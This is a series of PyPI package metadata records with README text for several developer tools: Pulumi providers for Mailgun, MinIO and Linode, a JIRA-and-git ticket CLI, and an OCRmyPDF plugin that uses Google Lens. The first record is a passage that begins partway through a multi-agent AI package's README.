└── js/app.js # Frontend logic
```
## 🔧 Architecture Highlights
- **LangGraph Orchestration** — Agents run as nodes in a compiled state graph with parallel execution for Memory, Logic, and Emotional processing
- **Modular LLM Factory** — Swap providers with a single parameter; no code changes needed
- **Dual Memory Architecture** — Working Memory (conversation buffer) + ZVec-powered Hippocampus (semantic persona biography search with 384-dim sentence transformer embeddings)
- **Persona Injection** — Role-specific context: each agent gets *different* aspects of the persona profile tailored to its function
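The "swap providers with a single parameter" idea is a standard factory pattern. A minimal, self-contained sketch of the pattern (illustrative only — `make_llm` and the client classes here are not the package's actual API):

```python
# Factory sketch: one function maps a provider name to a client object.
# Agents only ever call .complete(), so swapping providers is a one-argument change.

class OllamaClient:
    def __init__(self, model):
        self.model = model

    def complete(self, prompt):
        return f"[ollama:{self.model}] {prompt}"

class OpenAIClient:
    def __init__(self, model):
        self.model = model

    def complete(self, prompt):
        return f"[openai:{self.model}] {prompt}"

PROVIDERS = {"ollama": OllamaClient, "openai": OpenAIClient}

def make_llm(provider: str, model: str):
    """Return an LLM client for `provider`; raise on unknown names."""
    try:
        return PROVIDERS[provider](model)
    except KeyError:
        raise ValueError(f"unknown provider: {provider!r}") from None

llm = make_llm("ollama", "mistral")
print(llm.complete("hello"))  # [ollama:mistral] hello
```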
## 🤝 Contributing
Contributions are welcome! Some ideas:
- **Additional agents** — Add a Creativity Agent, Social Agent, or Moral Reasoning Agent
- **Streaming responses** — Real-time token streaming in the web UI
- **Multi-turn persona** — Let the persona evolve based on the conversation
- **Voice interface** — Add speech-to-text input and text-to-speech output
- **RAG over full books** — Index entire autobiographies (not just profiles) for deeper persona embodiment
## 📝 License
MIT License — see [LICENSE](LICENSE) for details.
---
<div align="center">
<i>Built with 🧠 by mapping neuroscience to multi-agent AI</i>
</div>
| text/markdown | null | Shivam Tyagi <shivamtyagi18@gmail.com> | null | null | MIT | agents, ai, brain, cognitive, langchain, langgraph, multi-agent | [
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: Scientific/Engineering :: Artificial Intelligence"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"langchain",
"langchain-community",
"langchain-core",
"langchain-google-genai",
"langchain-ollama",
"langchain-openai",
"langgraph",
"pypdf2",
"python-dotenv",
"zvec",
"build; extra == \"dev\"",
"twine; extra == \"dev\"",
"flask; extra == \"web\""
] | [] | [] | [] | [
"Homepage, https://github.com/shivamtyagi18/BRAIN",
"Repository, https://github.com/shivamtyagi18/BRAIN",
"Issues, https://github.com/shivamtyagi18/BRAIN/issues"
] | twine/6.2.0 CPython/3.11.14 | 2026-02-20T06:24:06.554215 | brain_system-0.4.0.tar.gz | 425,515 | 94/b0/3ecfaed2d237460b821ddee7dfd449d9535c7575b443719ff748df738c9c/brain_system-0.4.0.tar.gz | source | sdist | null | false | 950401703b8a0d487c1f4fcc348dacd8 | b32bce13a3167ce11df487569353d27df5509f69d38a21687318aa06e2c5ce8a | 94b03ecfaed2d237460b821ddee7dfd449d9535c7575b443719ff748df738c9c | null | [
"LICENSE"
] | 219 |
2.4 | pulumi-mailgun | 3.8.0a1771568257 | A Pulumi package for creating and managing Mailgun resources. | [](https://github.com/pulumi/pulumi-mailgun/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/mailgun)
[](https://pypi.org/project/pulumi-mailgun)
[](https://badge.fury.io/nu/pulumi.mailgun)
[](https://pkg.go.dev/github.com/pulumi/pulumi-mailgun/sdk/v3/go)
[](https://github.com/pulumi/pulumi-mailgun/blob/master/LICENSE)
# Mailgun Resource Provider
The Mailgun resource provider for Pulumi lets you manage Mailgun resources in your cloud programs. To use
this package, please [install the Pulumi CLI first](https://pulumi.io/).
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/mailgun
or `yarn`:
$ yarn add @pulumi/mailgun
### Python
To use from Python, install using `pip`:
$ pip install pulumi_mailgun
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-mailgun/sdk/v3
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Mailgun
## Configuration
The following configuration points are available:
- `mailgun:apikey` - (Required) Key used to authenticate to the Mailgun API. May be set via the `MAILGUN_API_KEY` environment variable.
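In a standard Pulumi workflow, the key can be stored as an encrypted stack secret or exported in the environment (regular Pulumi CLI usage, shown for illustration):

```shell
# Store the key as an encrypted secret in the current stack's config:
pulumi config set --secret mailgun:apikey "<your-api-key>"

# Or export it for the current shell session instead:
export MAILGUN_API_KEY="<your-api-key>"
```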
## Reference
For further information, please visit [the Mailgun provider docs](https://www.pulumi.com/docs/intro/cloud-providers/mailgun) or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/mailgun).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, mailgun | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-mailgun"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:24:05.250303 | pulumi_mailgun-3.8.0a1771568257.tar.gz | 23,262 | f0/07/b9b6f283949dee5234f2339b930954d07238851715096ae425c818414b5f/pulumi_mailgun-3.8.0a1771568257.tar.gz | source | sdist | null | false | 9bbcff83016483ac3724abd85496b418 | c710ff37f8a60d6bb7e7c4911217232b19b7722ce3d2bcd273c73bef48bcf57d | f007b9b6f283949dee5234f2339b930954d07238851715096ae425c818414b5f | null | [] | 190 |
2.4 | jira-git-helper | 0.9.0 | JIRA ticket context manager for git workflows | # jira-git-helper
A terminal-based JIRA ticket context manager for git workflows, invoked as `jg`.
`jg` keeps track of which JIRA ticket you're working on so that branch names,
commit messages, and PR lookups are automatically prefixed — without you having
to type the ticket key every time.
## How it works
`jg` maintains an **active ticket** for each terminal session (e.g. `SWY-1234`).
Once set, commands like `jg commit`, `jg branch`, and `jg push` automatically use
that ticket — you never have to copy-paste it again.
```
$ jg set # pick a ticket interactively
$ jg branch fix # creates SWY-1234-fix and switches to it
$ jg add # stage files and commit — ticket prefix added automatically
$ jg push # pushes branch and opens the linked PR
```
Each terminal window can track a different ticket independently.
---
## Installation
```sh
uv tool install jira-git-helper
```
Or with pipx:
```sh
pipx install jira-git-helper
```
---
## Quick start
**1. Connect to JIRA**
```sh
jg config set server https://yourcompany.atlassian.net
jg config set email you@yourcompany.com
jg config set token <your-jira-api-token>
```
Generate a token at: https://id.atlassian.com/manage-profile/security/api-tokens
**2. Set up the shell hook**
The hook lets each terminal track its own ticket independently. See [Shell hook](#shell-hook) for full details and shell-specific instructions.
**3. (Optional) Show the active ticket in your prompt**
See [Prompt integration](#prompt-integration) for fish/Tide, bash, and zsh instructions.
**4. (Optional) Scope tickets to your projects**
```sh
jg config set projects SWY
# or multiple:
jg config set projects SWY,DOPS
```
**5. Pick a ticket and start working**
```sh
jg set # opens an interactive picker
jg # shows the active ticket at any time
```
---
## Configuration
Config is stored in `~/.config/jira-git-helper/config`. Use `jg config set/get/list` to manage it.
### Required
| Key | Description |
|---|---|
| `server` | Your JIRA instance URL, e.g. `https://yourcompany.atlassian.net` |
| `email` | Your JIRA account email |
| `token` | Your JIRA API token |
### Optional
| Key | Description |
|---|---|
| `projects` | Comma-separated project keys to scope the ticket picker, e.g. `SWY` or `SWY,DOPS` |
| `jql.<PROJECT>` | Custom JQL for a specific project (see below) |
### Project scoping
Without `projects` set, `jg set` shows all tickets assigned to you across JIRA.
With `projects` set, results are scoped to just those projects:
```sh
# Single project
jg config set projects SWY
# Multiple projects — results from all projects are merged into one list
jg config set projects SWY,DOPS
```
### Per-project JQL
By default each project uses:
```
project = <KEY> AND assignee = currentUser() ORDER BY updated DESC
```
Override this for any project with a `jql.<PROJECT>` key:
```sh
jg config set jql.SWY "project = SWY AND sprint in openSprints() AND assignee = currentUser()"
jg config set jql.DOPS "project = DOPS AND status != Done AND assignee = currentUser()"
```
**JQL resolution order** (for a given project key):
1. `jql.<PROJECT>` — if set, this wins
2. `project = PROJECT AND assignee = currentUser() ORDER BY updated DESC` — default
When multiple projects are configured and none have custom JQL, a single combined
JIRA query is used. If any project has custom JQL, one query per project is run and
results are merged.
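The resolution order above can be sketched as a small function (hypothetical helper — `jg`'s internals may differ, and the combined-query form shown is an assumption):

```python
DEFAULT_JQL = "project = {key} AND assignee = currentUser() ORDER BY updated DESC"

def build_queries(projects, config):
    """Return the JIRA queries to run for the configured project keys.

    If no project has a custom jql.<PROJECT> override, a single combined
    query covers all projects; otherwise one query is issued per project,
    with per-project overrides winning over the default.
    """
    overrides = {p: config.get(f"jql.{p}") for p in projects}
    if not any(overrides.values()):
        keys = ", ".join(projects)
        return [f"project IN ({keys}) AND assignee = currentUser() ORDER BY updated DESC"]
    return [overrides[p] or DEFAULT_JQL.format(key=p) for p in projects]

print(build_queries(["SWY"], {"jql.SWY": "project = SWY AND sprint in openSprints()"}))
# ['project = SWY AND sprint in openSprints()']
```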
### View your current config
```sh
jg config list
```
This shows all standard keys plus any `jql.<PROJECT>` keys you've set.
---
## Shell hook
The hook does three things:
1. **Seeds `JG_TICKET`** from the last-used ticket when a new shell opens (so you
don't start from scratch every time).
2. **Keeps terminals isolated** — `jg set` in one terminal updates only that
terminal's `JG_TICKET`. Other open terminals are unaffected.
3. **Updates `JG_TICKET`** after `jg set` or `jg branch --all`, and clears it after
`jg clear`.
Without the hook, all terminals share the same ticket via the state file.
Fish — add to `~/.config/fish/config.fish`:
```fish
eval (jg hook)
```
Bash — add to `~/.bashrc`:
```sh
eval "$(jg hook --shell bash)"
```
Zsh — add to `~/.zshrc`:
```sh
eval "$(jg hook --shell zsh)"
```
---
## Prompt integration
### Fish / Tide
Display the active ticket in your [Tide](https://github.com/IlanCosman/tide) prompt.
Run once to install the prompt item:
```sh
jg setup
```
Then follow the printed instructions to add `jg` to your Tide prompt items.
> The `jg setup` command writes `~/.config/fish/functions/_tide_item_jg.fish`, which
> reads the shell-local `$JG_TICKET` variable — so each terminal shows its own ticket.
### Bash
The hook defines a `__jg_ps1` helper. Splice it into your `PS1` in `~/.bashrc`
(after the `eval` line):
```sh
PS1='$(__jg_ps1)\$ '
```
Or anywhere inside an existing prompt string, e.g.:
```sh
PS1='\u@\h $(__jg_ps1)\$ '
```
### Zsh
Same helper, different variable. Add to `~/.zshrc` (after the `eval` line):
```sh
PROMPT='$(__jg_ps1)%% '
```
`__jg_ps1` prints the active ticket followed by a space, or nothing if no ticket is set.
---
## Commands
### `jg`
Show the active ticket for the current session.
```sh
$ jg
SWY-1234
```
---
### `jg set [TICKET]`
Set the active ticket. With no argument, opens an interactive picker that fetches
tickets from JIRA based on your configured projects and JQL.
```sh
jg set # interactive picker
jg set SWY-1234 # set directly without opening the picker
```
**Flags:**
| Flag | Description |
|---|---|
| `--jql "..."` | Use a raw JQL query instead of configured project JQL. Useful for one-off searches without changing your config. |
| `--max N` | Maximum number of tickets to fetch (default: `200`) |
**Examples:**
```sh
# Show only high-priority tickets, one-off
jg set --jql "project = SWY AND priority = Highest ORDER BY created DESC"
# Fetch more results than the default
jg set --max 500
```
**Interactive picker controls:**
| Key | Action |
|---|---|
| `↑` / `↓` | Move between tickets |
| `/` | Open filter bar — type to narrow by key, summary, assignee, or status |
| `Enter` | Select the highlighted ticket (or confirm filter and return to list) |
| `Escape` | Close filter / cancel |
---
### `jg clear`
Clear the active ticket for the current session.
```sh
jg clear
```
---
### `jg info [TICKET]`
Show a rich summary panel for a ticket, including: summary, status, priority,
assignee, reporter, labels, URL, and a description excerpt (truncated at 800 chars).
```sh
jg info # uses the active ticket
jg info SWY-5678 # look up any ticket by key
```
---
### `jg open [TICKET]`
Open a ticket in your browser.
```sh
jg open # opens the active ticket
jg open SWY-5678 # open any ticket by key
```
---
### `jg branch [name]`
Work with git branches scoped to the active ticket.
**With no arguments** — opens an interactive branch picker showing all local branches
that match the active ticket key. Selecting one switches to it.
```sh
jg branch
```
**With a name** — creates a new branch named `TICKET-branch-name` (using `git switch -C`)
and switches to it.
```sh
jg branch my-feature # creates SWY-1234-my-feature
```
**With `--all`** — shows all local branches matching any of your configured projects,
regardless of the active ticket. Selecting a branch also sets the active ticket to
match the ticket key embedded in the branch name.
```sh
jg branch --all # requires `projects` to be configured
```
| Flag | Description |
|---|---|
| `--all` | Browse all project branches and update the active ticket to match |
> **Note:** `--all` requires `projects` to be configured.
> Branch names are expected to follow the `PROJECT-1234-description` convention.
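For `--all`, the ticket key embedded in a branch name can be recovered with a simple pattern match (illustrative only; `jg`'s actual matching may differ):

```python
import re

def ticket_from_branch(branch, projects):
    """Return the ticket key at the start of `branch` (e.g. SWY-1234 from
    SWY-1234-my-feature) if it belongs to one of the configured projects."""
    m = re.match(r"([A-Z][A-Z0-9]*)-(\d+)", branch)
    if m and m.group(1) in projects:
        return f"{m.group(1)}-{m.group(2)}"
    return None

print(ticket_from_branch("SWY-1234-fix-login", ["SWY", "DOPS"]))  # SWY-1234
```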
**Interactive picker controls:**
| Key | Action |
|---|---|
| `↑` / `↓` | Move between branches |
| `/` | Open filter bar — type to narrow by branch name |
| `Enter` | Switch to the highlighted branch (or confirm filter and return to list) |
| `Escape` | Close filter / cancel |
---
### `jg add`
An interactive TUI for staging files and committing — all in one step.
```sh
jg add
```
The screen is split into up to three sections (staged, modified, untracked). Use `Space`
to toggle files between staged/unstaged, then `Enter` to open the commit message
prompt. The commit message is automatically prefixed with the active ticket key.
**Controls:**
| Key | Action |
|---|---|
| `↑` / `↓` | Move between files |
| `Space` | Stage or unstage the highlighted file |
| `/` | Open filter bar for the focused section |
| `Enter` | Open commit message prompt (or confirm filter and return to list) |
| `Escape` | Close filter / cancel |
> **Note:** If no ticket is set, `jg add` will prompt you to pick one interactively before proceeding.
---
### `jg commit <message>`
Commit with the active ticket key automatically prepended to the message.
```sh
jg commit "fix login redirect"
# runs: git commit -m "SWY-1234 fix login redirect"
```
Any extra arguments after the message are passed through to `git commit`:
```sh
jg commit "fix login redirect" --no-verify
jg commit "fix login redirect" --amend
```
> **Note:** Refuses to run on `main` or `master`. Use `jg branch <name>` to create a feature branch first.
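The behavior above amounts to two checks before delegating to git — sketched here as a hypothetical helper, not `jg`'s actual code:

```python
def build_commit_command(ticket, message, branch, extra_args=()):
    """Compose a jg-style git commit: prefix the message with the active
    ticket key and refuse to commit on protected branches."""
    if branch in ("main", "master"):
        raise RuntimeError(f"refusing to commit on {branch}; create a feature branch first")
    return ["git", "commit", "-m", f"{ticket} {message}", *extra_args]

print(build_commit_command("SWY-1234", "fix login redirect", "SWY-1234-fix"))
# ['git', 'commit', '-m', 'SWY-1234 fix login redirect']
```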
---
### `jg push`
Push the current branch to origin (`git push -u origin HEAD`) and open the linked
PR in your browser.
```sh
jg push
```
After pushing, `jg push` looks up the active ticket in JIRA to find any linked open
PR. If found, it opens that PR. If not found but GitHub printed a "Create a pull
request" URL during the push, it opens that instead.
---
### `jg prs [TICKET]`
Browse all GitHub PRs linked to a ticket in an interactive TUI, with inline diff viewing.
```sh
jg prs # uses the active ticket
jg prs SWY-5678 # browse PRs for any ticket
```
Columns shown: Status, Author, Repo, Source branch, Title. PRs are sorted with open
ones first, then by last-updated date. Status is colour-coded: green (open), yellow
(draft), blue (merged), red (declined).
**Controls:**
| Key | Action |
|---|---|
| `↑` / `↓` | Move between PRs |
| `/` | Open filter bar — searches status, author, repo, branch, and title |
| `o` | Open the highlighted PR in your browser |
| `d` | View the PR diff inline |
| `Escape` | Close filter / quit |
**Diff viewer:**
Press `d` on any PR (open or merged) to open a full-screen diff viewer. If
[`delta`](https://github.com/dandavison/delta) is installed it is used for
syntax-aware colouring; otherwise Rich syntax highlighting is applied.
| Key | Action |
|---|---|
| `↑` / `↓` | Scroll the diff |
| `/` | Open search bar — type a term and press `Enter` to commit the search |
| `Enter` | Jump to the next match (cycles through all matches) |
| `n` | Jump to the next file in the diff |
| `p` | Jump to the previous file in the diff |
| `Escape` | Clear active search, or close the diff viewer |
An active search is shown in an amber status bar above the footer, displaying the
search term and current position (e.g. `Search: foo 3/7 matches — Enter next Esc clear`).
All matches are highlighted inline. Press `Escape` once to clear the search, and
again to close the diff viewer.
> **Requires:** [`gh` CLI](https://cli.github.com) installed and authenticated.
---
### `jg config get <key>`
Print a single config value.
```sh
jg config get server
jg config get jql.SWY
```
Exits with a non-zero status if the key is not set.
---
### `jg config set <key> <value>`
Set a config value. Standard keys are `server`, `email`, `token`, and `projects`.
Use `jql.<PROJECT>` to set per-project JQL:
```sh
jg config set server https://yourcompany.atlassian.net
jg config set email you@yourcompany.com
jg config set token <api-token>
jg config set projects SWY,DOPS
jg config set jql.SWY "project = SWY AND sprint in openSprints() AND assignee = currentUser()"
```
---
### `jg config list`
List all configured values. Masks the `token` value for safety. Automatically
shows any `jql.<PROJECT>` keys you have set.
```sh
jg config list
```
---
### `jg hook [--shell fish|bash|zsh]`
Print the shell hook function to stdout. Intended to be evaluated in your shell
startup file (see [Shell hook](#shell-hook) above).
```sh
jg hook # fish (default)
jg hook --shell bash
jg hook --shell zsh
```
| Flag | Description |
|---|---|
| `--shell fish\|bash\|zsh` | Shell to emit the hook for (default: `fish`) |
The bash/zsh hook also defines `__jg_ps1` for prompt integration (see
[Prompt integration](#prompt-integration)).
---
### `jg setup`
Configure fish/Tide prompt integration. Creates
`~/.config/fish/functions/_tide_item_jg.fish` and prints the follow-up `set -U`
commands needed to activate and style the prompt item.
```sh
jg setup
```
> Fish/Tide only. For bash/zsh prompt integration, see [Prompt integration](#prompt-integration).
---
### `jg version`
Print the installed version.
```sh
jg version
# or
jg --version
```
---
## Requirements
- Python 3.10+
- `gh` CLI — required for PR diff viewing in `jg prs` — https://cli.github.com
---
## License
MIT
| text/markdown | Ross Cousens | null | null | null | MIT | cli, developer-tools, git, jira, workflow | [
"Development Status :: 3 - Alpha",
"Environment :: Console",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Topic :: Software Development :: Version Control",
"Topic :: Utilities"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"click>=8.3.1",
"jira>=3.10.5",
"requests>=2.32.0",
"textual>=8.0.0"
] | [] | [] | [] | [
"Homepage, https://github.com/YOUR_USERNAME/jira-git-helper",
"Bug Tracker, https://github.com/YOUR_USERNAME/jira-git-helper/issues"
] | uv/0.10.3 {"installer":{"name":"uv","version":"0.10.3","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"macOS","version":null,"id":null,"libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":null} | 2026-02-20T06:23:56.136082 | jira_git_helper-0.9.0.tar.gz | 29,120 | 35/5b/0bb98ae24eba76f636fe9e564ec01dcce0842cbcafa75ea7b2aeb68860ff/jira_git_helper-0.9.0.tar.gz | source | sdist | null | false | dd2e356bab17f706c43dba13a4ba9854 | a869f41b85add2cc5c0fafdb3e80e71343d4e1480da781cb1304a36fbf17887f | 355b0bb98ae24eba76f636fe9e564ec01dcce0842cbcafa75ea7b2aeb68860ff | null | [
"LICENSE"
] | 209 |
2.4 | pulumi-minio | 1.0.0a1771568231 | A Pulumi package for creating and managing minio cloud resources. | [](https://github.com/pulumi/pulumi-minio/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/minio)
[](https://pypi.org/project/pulumi-minio)
[](https://badge.fury.io/nu/pulumi.minio)
[](https://pkg.go.dev/github.com/pulumi/pulumi-minio/sdk/go)
[](https://github.com/pulumi/pulumi-minio/blob/master/LICENSE)
# Minio Resource Provider
The Minio Resource Provider lets you manage resources in a Minio installation.
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/minio
or `yarn`:
$ yarn add @pulumi/minio
### Python
To use from Python, install using `pip`:
$ pip install pulumi_minio
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-minio/sdk
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Minio
## Configuration
The following configuration points are available:
* `minio:minioServer` - (Required) Minio Host and Port. It must be provided, but
it can also be sourced from the `MINIO_ENDPOINT` environment variable
* `minio:minioAccessKey` - (Required) Minio Access Key. It must be provided, but
it can also be sourced from the `MINIO_ACCESS_KEY` environment variable
* `minio:minioSecretKey` - (Required) Minio Secret Key. It must be provided, but
it can also be sourced from the `MINIO_SECRET_KEY` environment variable
* `minio:minioRegion` - (Optional) Minio Region (`default: us-east-1`).
* `minio:minioApiVersion` - (Optional) Minio API Version (type: string, options: `v2` or `v4`, default: `v4`).
* `minio:minioSsl` - (Optional) Minio SSL enabled (default: `false`). It can also be sourced from the
`MINIO_ENABLE_HTTPS` environment variable
## Reference
For further information, please visit [the Minio provider docs](https://www.pulumi.com/docs/intro/cloud-providers/minio)
or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/minio).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, minio | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-minio"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:23:49.576101 | pulumi_minio-1.0.0a1771568231.tar.gz | 25,454 | 21/37/e8d33dcbc685b217abb4021ea86135c9fd9c5d3a5d03e05ec81f30f25976/pulumi_minio-1.0.0a1771568231.tar.gz | source | sdist | null | false | 72c641eb1b963a2713dc7a6520c2f8c6 | 5dec1ec06327f93439a23a7764a9f2c5827513950563f6fd859f39e623bf21e8 | 2137e8d33dcbc685b217abb4021ea86135c9fd9c5d3a5d03e05ec81f30f25976 | null | [] | 189 |
2.4 | pulumi-linode | 5.8.0a1771568163 | A Pulumi package for creating and managing linode cloud resources. | [](https://github.com/pulumi/pulumi-linode/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/linode)
[](https://pypi.org/project/pulumi-linode)
[](https://badge.fury.io/nu/pulumi.linode)
[](https://pkg.go.dev/github.com/pulumi/pulumi-linode/sdk/v4/go)
[](https://github.com/pulumi/pulumi-linode/blob/master/LICENSE)
# Linode Resource Provider
The Linode resource provider for Pulumi lets you use Linode resources in your cloud programs. To use
this package, please [install the Pulumi CLI first](https://pulumi.io/).
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/linode
or `yarn`:
$ yarn add @pulumi/linode
### Python
To use from Python, install using `pip`:
$ pip install pulumi_linode
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-linode/sdk/v4
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Linode
## Configuration
The following configuration points are available:
- `linode:token` - (Required) This is your Linode APIv4 Token. May be specified using the `LINODE_TOKEN` environment variable.
- `linode:url` - (Optional) The HTTP(S) API address of the Linode API to use. May be specified using the `LINODE_URL` environment variable.
- `linode:uaPrefix` - (Optional) An HTTP User-Agent Prefix to prepend in API requests. May be specified using the `LINODE_UA_PREFIX` environment variable.
## Reference
For further information, please visit [the Linode provider docs](https://www.pulumi.com/docs/intro/cloud-providers/linode) or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/linode).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, linode | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-linode"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:23:46.118620 | pulumi_linode-5.8.0a1771568163.tar.gz | 392,803 | b1/f4/6bd36f4d9fb945bcd83b67fc85a8b6a1f16c077e8303f4e4011c5699a2f1/pulumi_linode-5.8.0a1771568163.tar.gz | source | sdist | null | false | 5dcf7908739e4b0bfa9b3e65fdb1f4d9 | 9a3e4f1810ef5f1f286d7b406dbb96d8de673fc4d99c42359b910e40f1c884b3 | b1f46bd36f4d9fb945bcd83b67fc85a8b6a1f16c077e8303f4e4011c5699a2f1 | null | [] | 193 |
2.4 | ocrmypdf-chromelens-ocr | 1.0.7 | OCRmyPDF plugin using Google Lens API for OCR | # OCRmyPDF-ChromeLens-Ocr
OCRmyPDF plugin that uses Google Lens (`v1/crupload`) as OCR backend.
## What It Does
- Sends rasterized page images to Google Lens and parses protobuf response into hOCR + text.
- Preserves hierarchical layout (paragraphs/lines/words), including rotation metadata (`textangle` in hOCR lines).
- Handles word separators from Lens response for better spacing fidelity.
- Includes optional de-hyphenation for line-broken words.
- Tries to preserve superscript glyphs (for example `¹²³`) by overriding OCRmyPDF's NFKC normalization path.
## Installation
Prerequisite: install `ocrmypdf`.
Install from Git:
```bash
pip install git+https://github.com/atlantos/OCRmyPDF-ChromeLens-Ocr.git
```
Install from PyPI:
```bash
pip install ocrmypdf-chromelens-ocr
```
## Usage
Basic usage:
```bash
ocrmypdf --plugin ocrmypdf_chromelens_ocr input.pdf output.pdf
```
Debug dump example:
```bash
ocrmypdf \
--plugin ocrmypdf_chromelens_ocr \
--keep-temporary-files \
--chromelens-dump-debug \
input.pdf output.pdf
```
## Plugin CLI Options
| Option | Description | Default |
| :--- | :--- | :--- |
| `--chromelens-no-dehyphenation` | Disable de-hyphenation across adjacent lines. | `false` |
| `--chromelens-max-dehyphen-len` | Max prefix/suffix length threshold for de-hyphenation merge. | `10` |
| `--chromelens-dump-debug` | Write raw request/response + parsed layout artifacts next to `*_ocr_hocr.*` temp files. Works only with `--keep-temporary-files`. | `false` |
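The de-hyphenation merge works roughly like this: when a line ends in a hyphenated word fragment and both the fragment and the continuation on the next line are short enough, the halves are joined. A simplified illustration (the plugin's actual heuristics are more involved):

```python
def dehyphenate(lines, max_len=10):
    """Merge words broken across lines with a trailing hyphen, when both the
    prefix (before '-') and the suffix on the next line fit within max_len."""
    out, i = [], 0
    while i < len(lines):
        line = lines[i]
        if line.endswith("-") and i + 1 < len(lines):
            prefix = line.rsplit(" ", 1)[-1][:-1]   # word fragment before '-'
            nxt = lines[i + 1].split(" ", 1)
            suffix = nxt[0]
            if 0 < len(prefix) <= max_len and 0 < len(suffix) <= max_len:
                merged = line[:-1] + suffix          # drop '-' and join halves
                rest = nxt[1] if len(nxt) > 1 else ""
                out.append(merged + (" " + rest if rest else ""))
                i += 2
                continue
        out.append(line)
        i += 1
    return out

print(dehyphenate(["the imple-", "mentation works"]))
# ['the implementation works']
```

Passing `--chromelens-no-dehyphenation` would correspond to skipping this step entirely, and `--chromelens-max-dehyphen-len` to the `max_len` threshold.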
## Current Implementation Defaults
These are hardcoded in `src/ocrmypdf_chromelens_ocr/plugin.py`:
- Upload format: `JPEG`
- JPEG quality: `95`
- Max upload long edge:
- OCRmyPDF v16: `1600`
- OCRmyPDF v17+: `1200`
- Fixed request locale/context:
- language `en`, region `US`, timezone `America/New_York`
- Chrome-style request headers:
- `x-browser-channel`, `x-browser-year`, `x-browser-copyright`, `x-browser-validation`
Note: OCRmyPDF language flags (`-l/--language`) are not propagated to Lens request context; Lens auto-detection is relied on.
## Compatibility
- Python `>=3.9`
- OCRmyPDF `>=16.0.0`
- Tested with OCRmyPDF 16 and 17 code paths
## Limitations
- Uses undocumented/private Google API and may break without notice.
- Requires network access and uploads page images to Google servers.
- OCR quality depends on Lens behavior and can vary by document type.
- `generate_pdf()` in the plugin is not implemented; OCR output is produced through hOCR/text path.
## Credits
- [chrome-lens-ocr](https://github.com/dimdenGD/chrome-lens-ocr) for protobuf/API reverse-engineering ideas.
- [OCRmyPDF-AppleOCR](https://github.com/mkyt/OCRmyPDF-AppleOCR) for plugin architecture inspiration.
## License
MIT
| text/markdown | null | Victor Sakovich <atlantos@gmail.com> | null | null | MIT License
Copyright (c) 2026 Victor Sakovich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
